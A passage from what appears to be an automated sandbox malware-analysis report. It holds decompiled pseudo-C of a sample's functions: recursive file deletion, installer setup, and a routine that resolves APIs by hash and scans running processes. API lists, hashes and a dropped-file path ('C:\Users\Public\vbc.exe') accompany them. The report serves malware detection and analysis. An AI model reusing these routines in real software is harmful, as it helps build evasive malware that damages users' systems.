                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 72E31C0C
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 72E31C16
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E31C29
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E31D09
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E31D0E
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E31D13
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E31EFA
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 72E32098
                                                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(00000008), ref: 72E32114
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000008), ref: 72E32125
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 72E3217E
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000408), ref: 72E32198
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 245916457-0
                                                                                                                                                                                                          • Opcode ID: 7eb13c7d947b525850fa274e08903134187d7c720bd20941439d5fdfc2e13ff0
                                                                                                                                                                                                          • Instruction ID: 4dad9d2b2c5bf68a072bec29d6dc6d1cc6d5dec442013037195bf9b567632956
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7eb13c7d947b525850fa274e08903134187d7c720bd20941439d5fdfc2e13ff0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B227971D042499FCB138FA9C9807EDBBF5BB0530BF90E52ED196AA182D7745981CB90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                          			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				struct _WIN32_FIND_DATAA _v336;
                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                          				char* _t53;
                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                          				signed int _t64;
                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                          				signed char _t69;
                                                                                                                                                                                                          				CHAR* _t71;
                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                          				CHAR* _t73;
                                                                                                                                                                                                          				char* _t76;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t69 = _a8;
                                                                                                                                                                                                          				_t73 = _a4;
                                                                                                                                                                                                          				_v8 = _t69 & 0x00000004;
                                                                                                                                                                                                          				_t40 = E00405CD3(__eflags, _t73);
                                                                                                                                                                                                          				_v16 = _t40;
                                                                                                                                                                                                          				if((_t69 & 0x00000008) != 0) {
                                                                                                                                                                                                          					_t66 = DeleteFileA(_t73); // executed
                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                          					_t68 =  ~_t66 + 1;
                                                                                                                                                                                                          					 *0x42f4e8 =  *0x42f4e8 + _t68;
                                                                                                                                                                                                          					return _t68;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_a4 = _t69;
                                                                                                                                                                                                          				_t8 =  &_a4;
                                                                                                                                                                                                          				 *_t8 = _a4 & 0x00000001;
                                                                                                                                                                                                          				__eflags =  *_t8;
                                                                                                                                                                                                          				if( *_t8 == 0) {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					E0040624D(0x42b8c0, _t73);
                                                                                                                                                                                                          					__eflags = _a4;
                                                                                                                                                                                                          					if(_a4 == 0) {
                                                                                                                                                                                                          						E00405C2C(_t73);
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						lstrcatA(0x42b8c0, "\*.*");
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags =  *_t73;
                                                                                                                                                                                                          					if( *_t73 != 0) {
                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                          						lstrcatA(_t73, 0x40a014);
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                                                                                                                                                                          						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
                                                                                                                                                                                                          						__eflags = _t40 - 0xffffffff;
                                                                                                                                                                                                          						_v12 = _t40;
                                                                                                                                                                                                          						if(_t40 == 0xffffffff) {
                                                                                                                                                                                                          							L29:
                                                                                                                                                                                                          							__eflags = _a4;
                                                                                                                                                                                                          							if(_a4 != 0) {
                                                                                                                                                                                                          								_t32 = _t71 - 1;
                                                                                                                                                                                                          								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                                                                                                                                          								__eflags =  *_t32;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L31;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L12;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							L12:
                                                                                                                                                                                                          							_t76 =  &(_v336.cFileName);
                                                                                                                                                                                                          							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
                                                                                                                                                                                                          							__eflags =  *_t53;
                                                                                                                                                                                                          							if( *_t53 != 0) {
                                                                                                                                                                                                          								__eflags = _v336.cAlternateFileName;
                                                                                                                                                                                                          								if(_v336.cAlternateFileName != 0) {
                                                                                                                                                                                                          									_t76 =  &(_v336.cAlternateFileName);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags =  *_t76 - 0x2e;
                                                                                                                                                                                                          							if( *_t76 != 0x2e) {
                                                                                                                                                                                                          								L19:
                                                                                                                                                                                                          								E0040624D(_t71, _t76);
                                                                                                                                                                                                          								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                          									_t55 = E004059CD(__eflags, _t73, _v8);
                                                                                                                                                                                                          									__eflags = _t55;
                                                                                                                                                                                                          									if(_t55 != 0) {
                                                                                                                                                                                                          										E00405374(0xfffffff2, _t73);
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										__eflags = _v8 - _t55;
                                                                                                                                                                                                          										if(_v8 == _t55) {
                                                                                                                                                                                                          											 *0x42f4e8 =  *0x42f4e8 + 1;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											E00405374(0xfffffff1, _t73);
                                                                                                                                                                                                          											E0040602C(_t72, _t73, 0);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                          										E00405A15(__eflags, _t73, _a8);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                                                                                                                                                                          							__eflags = _t64;
                                                                                                                                                                                                          							if(_t64 == 0) {
                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t64 - 0x2e;
                                                                                                                                                                                                          							if(_t64 != 0x2e) {
                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags =  *((char*)(_t76 + 2));
                                                                                                                                                                                                          							if( *((char*)(_t76 + 2)) == 0) {
                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L19;
                                                                                                                                                                                                          							L27:
                                                                                                                                                                                                          							_t58 = FindNextFileA(_v12,  &_v336);
                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                          						} while (_t58 != 0);
                                                                                                                                                                                                          						_t40 = FindClose(_v12);
                                                                                                                                                                                                          						goto L29;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags =  *0x42b8c0 - 0x5c;
                                                                                                                                                                                                          					if( *0x42b8c0 != 0x5c) {
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					__eflags = _t40;
                                                                                                                                                                                                          					if(_t40 == 0) {
                                                                                                                                                                                                          						L31:
                                                                                                                                                                                                          						__eflags = _a4;
                                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                                          							L39:
                                                                                                                                                                                                          							return _t40;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _v16;
                                                                                                                                                                                                          						if(_v16 != 0) {
                                                                                                                                                                                                          							_t40 = E004065C1(_t73);
                                                                                                                                                                                                          							__eflags = _t40;
                                                                                                                                                                                                          							if(_t40 == 0) {
                                                                                                                                                                                                          								goto L39;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E00405BE5(_t73);
                                                                                                                                                                                                          							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
                                                                                                                                                                                                          							__eflags = _t40;
                                                                                                                                                                                                          							if(_t40 != 0) {
                                                                                                                                                                                                          								return E00405374(0xffffffe5, _t73);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _v8;
                                                                                                                                                                                                          							if(_v8 == 0) {
                                                                                                                                                                                                          								goto L33;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E00405374(0xfffffff1, _t73);
                                                                                                                                                                                                          							return E0040602C(_t72, _t73, 0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L33:
                                                                                                                                                                                                          						 *0x42f4e8 =  *0x42f4e8 + 1;
                                                                                                                                                                                                          						return _t40;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t69 & 0x00000002;
                                                                                                                                                                                                          					if((_t69 & 0x00000002) == 0) {
                                                                                                                                                                                                          						goto L31;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          0x00405a93
                                                                                                                                                                                                          0x00405a96
                                                                                                                                                                                                          0x00405aa1
                                                                                                                                                                                                          0x00405aa7
                                                                                                                                                                                                          0x00405aac
                                                                                                                                                                                                          0x00405abc
                                                                                                                                                                                                          0x00405abe
                                                                                                                                                                                                          0x00405ac4
                                                                                                                                                                                                          0x00405ac7
                                                                                                                                                                                                          0x00405aca
                                                                                                                                                                                                          0x00405b82
                                                                                                                                                                                                          0x00405b82
                                                                                                                                                                                                          0x00405b86
                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405ad0
                                                                                                                                                                                                          0x00405ad0
                                                                                                                                                                                                          0x00405ad9
                                                                                                                                                                                                          0x00405adf
                                                                                                                                                                                                          0x00405ae4
                                                                                                                                                                                                          0x00405ae7
                                                                                                                                                                                                          0x00405ae9
                                                                                                                                                                                                          0x00405aed
                                                                                                                                                                                                          0x00405aef
                                                                                                                                                                                                          0x00405aef
                                                                                                                                                                                                          0x00405aed
                                                                                                                                                                                                          0x00405af2
                                                                                                                                                                                                          0x00405af5
                                                                                                                                                                                                          0x00405b08
                                                                                                                                                                                                          0x00405b0a
                                                                                                                                                                                                          0x00405b0f
                                                                                                                                                                                                          0x00405b16
                                                                                                                                                                                                          0x00405b31
                                                                                                                                                                                                          0x00405b36
                                                                                                                                                                                                          0x00405b38
                                                                                                                                                                                                          0x00405b5c
                                                                                                                                                                                                          0x00405b3a
                                                                                                                                                                                                          0x00405b3a
                                                                                                                                                                                                          0x00405b3d
                                                                                                                                                                                                          0x00405b51
                                                                                                                                                                                                          0x00405b3f
                                                                                                                                                                                                          0x00405b42
                                                                                                                                                                                                          0x00405b4a
                                                                                                                                                                                                          0x00405b4a
                                                                                                                                                                                                          0x00405b3d
                                                                                                                                                                                                          0x00405b18
                                                                                                                                                                                                          0x00405b1e
                                                                                                                                                                                                          0x00405b20
                                                                                                                                                                                                          0x00405b26
                                                                                                                                                                                                          0x00405b26
                                                                                                                                                                                                          0x00405b20
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b16
                                                                                                                                                                                                          0x00405af7
                                                                                                                                                                                                          0x00405afa
                                                                                                                                                                                                          0x00405afc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405afe
                                                                                                                                                                                                          0x00405b00
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b02
                                                                                                                                                                                                          0x00405b06
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b61
                                                                                                                                                                                                          0x00405b6b
                                                                                                                                                                                                          0x00405b71
                                                                                                                                                                                                          0x00405b71
                                                                                                                                                                                                          0x00405b7c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b7c
                                                                                                                                                                                                          0x00405a98
                                                                                                                                                                                                          0x00405a9f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405a5d
                                                                                                                                                                                                          0x00405a5d
                                                                                                                                                                                                          0x00405a5f
                                                                                                                                                                                                          0x00405b8c
                                                                                                                                                                                                          0x00405b8e
                                                                                                                                                                                                          0x00405b91
                                                                                                                                                                                                          0x00405be2
                                                                                                                                                                                                          0x00405be2
                                                                                                                                                                                                          0x00405be2
                                                                                                                                                                                                          0x00405b93
                                                                                                                                                                                                          0x00405b96
                                                                                                                                                                                                          0x00405ba1
                                                                                                                                                                                                          0x00405ba6
                                                                                                                                                                                                          0x00405ba8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405bab
                                                                                                                                                                                                          0x00405bb7
                                                                                                                                                                                                          0x00405bbc
                                                                                                                                                                                                          0x00405bbe
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405bd9
                                                                                                                                                                                                          0x00405bc0
                                                                                                                                                                                                          0x00405bc3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405bc8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405bcf
                                                                                                                                                                                                          0x00405b98
                                                                                                                                                                                                          0x00405b98
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b98
                                                                                                                                                                                                          0x00405a65
                                                                                                                                                                                                          0x00405a68
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405a68

APIs
• DeleteFileA.KERNELBASE(?,?,76712754,766F13E0,00000000), ref: 00405A3E
• lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,76712754,766F13E0,00000000), ref: 00405A86
• lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,76712754,766F13E0,00000000), ref: 00405AA7
• lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,76712754,766F13E0,00000000), ref: 00405AAD
• FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,76712754,766F13E0,00000000), ref: 00405ABE
• FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
• FindClose.KERNEL32(00000000), ref: 00405B7C
Strings
Memory Dump Source
• Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: "C:\Users\Public\vbc.exe" $\*.*
                                                                                                                                                                                                          • API String ID: 2035342205-1024247051
                                                                                                                                                                                                          • Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                                                                                                                                          • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E722F4225(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                          				char _v544;
                                                                                                                                                                                                          				void* _v580;
                                                                                                                                                                                                          				struct tagPROCESSENTRY32W* _t25;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v8 = E722F458C();
                                                                                                                                                                                                          				_v16 = E722F4634(_v8, 0xea31d3b6);
                                                                                                                                                                                                          				_v20 = E722F4634(_v8, 0x5c7bf6e9);
                                                                                                                                                                                                          				_v24 = E722F4634(_v8, 0x873d1860);
                                                                                                                                                                                                          				_v12 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                          				if(_v12 != 0xffffffff) {
                                                                                                                                                                                                          					_v580 = 0x22c;
                                                                                                                                                                                                          					_t25 =  &_v580;
                                                                                                                                                                                                          					Process32FirstW(_v12, _t25);
                                                                                                                                                                                                          					if(_t25 != 0) {
                                                                                                                                                                                                          						while(E722F41E1( &_v544) != _a4) {
                                                                                                                                                                                                          							if(Process32NextW(_v12,  &_v580) != 0) {
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 722F426A
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 722F428E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2353314856-0
                                                                                                                                                                                                          • Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                                                                                                                                          • Instruction ID: 83990cd622ead0c82555f66ccf723171e25f8eccc97857c353b940cbae8d1a8b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C111570E1020AAADB11DFB8CC48FADFBB8EF04314F1045B5EB15E2258E7B48B91DA51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004065C1(CHAR* _a4) {
                                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
                                                                                                                                                                                                          				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				FindClose(_t2);
                                                                                                                                                                                                          				return 0x42c108;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(76712754,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,76712754,?,766F13E0,00405A35,?,76712754,766F13E0), ref: 004065CC
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004065D8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                          • Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                                                                                                                                          • Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E00403A60(void* __eflags) {
                                                                                                                                                                                                          				intOrPtr _v4;
                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                          				void _v16;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				intOrPtr* _t17;
                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                          				int _t34;
                                                                                                                                                                                                          				int _t35;
                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                          				char _t57;
                                                                                                                                                                                                          				CHAR* _t59;
                                                                                                                                                                                                          				signed char _t63;
                                                                                                                                                                                                          				CHAR* _t74;
                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                          				CHAR* _t81;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t76 =  *0x42f454;
                                                                                                                                                                                                          				_t17 = E00406656(2);
                                                                                                                                                                                                          				_t84 = _t17;
                                                                                                                                                                                                          				if(_t17 == 0) {
                                                                                                                                                                                                          					_t74 = 0x42a8b8;
                                                                                                                                                                                                          					"1033" = 0x30;
                                                                                                                                                                                                          					 *0x436001 = 0x78;
                                                                                                                                                                                                          					 *0x436002 = 0;
                                                                                                                                                                                                          					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
                                                                                                                                                                                                          					__eflags =  *0x42a8b8;
                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                          						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					lstrcatA("1033", _t74);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E004061AB("1033",  *_t17() & 0x0000ffff);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E00403D25(_t71, _t84);
                                                                                                                                                                                                          				_t80 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
                                                                                                                                                                                                          				 *0x42f4e0 =  *0x42f45c & 0x00000020;
                                                                                                                                                                                                          				 *0x42f4fc = 0x10000;
                                                                                                                                                                                                          				if(E00405CD3(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                          					if(E00405CD3(_t92, _t80) == 0) {
                                                                                                                                                                                                          						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
                                                                                                                                                                                                          					 *0x42ec28 = _t25;
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                          						if(E0040140B(0) == 0) {
                                                                                                                                                                                                          							_t27 = E00403D25(_t71, __eflags);
                                                                                                                                                                                                          							__eflags =  *0x42f500;
                                                                                                                                                                                                          							if( *0x42f500 != 0) {
                                                                                                                                                                                                          								_t28 = E00405446(_t27, 0);
                                                                                                                                                                                                          								__eflags = _t28;
                                                                                                                                                                                                          								if(_t28 == 0) {
                                                                                                                                                                                                          									E0040140B(1);
                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags =  *0x42ec0c; // 0x0
                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                          									E0040140B(2);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L22;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							ShowWindow( *0x42a898, 5); // executed
                                                                                                                                                                                                          							_t34 = E004065E8("RichEd20"); // executed
                                                                                                                                                                                                          							__eflags = _t34;
                                                                                                                                                                                                          							if(_t34 == 0) {
                                                                                                                                                                                                          								E004065E8("RichEd32");
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t81 = "RichEdit20A";
                                                                                                                                                                                                          							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
                                                                                                                                                                                                          							__eflags = _t35;
                                                                                                                                                                                                          							if(_t35 == 0) {
                                                                                                                                                                                                          								GetClassInfoA(0, "RichEdit", 0x42ebe0);
                                                                                                                                                                                                          								 *0x42ec04 = _t81;
                                                                                                                                                                                                          								RegisterClassA(0x42ebe0);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t36 =  *0x42ec20; // 0x0
                                                                                                                                                                                                          							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
                                                                                                                                                                                                          							E004039B0(E0040140B(5), 1);
                                                                                                                                                                                                          							return _t39;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                          						_t31 = 2;
                                                                                                                                                                                                          						return _t31;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t71 =  *0x42f440;
                                                                                                                                                                                                          						 *0x42ebe4 = E00401000;
                                                                                                                                                                                                          						 *0x42ebf0 =  *0x42f440;
                                                                                                                                                                                                          						 *0x42ebf4 = _t25;
                                                                                                                                                                                                          						 *0x42ec04 = 0x40a210;
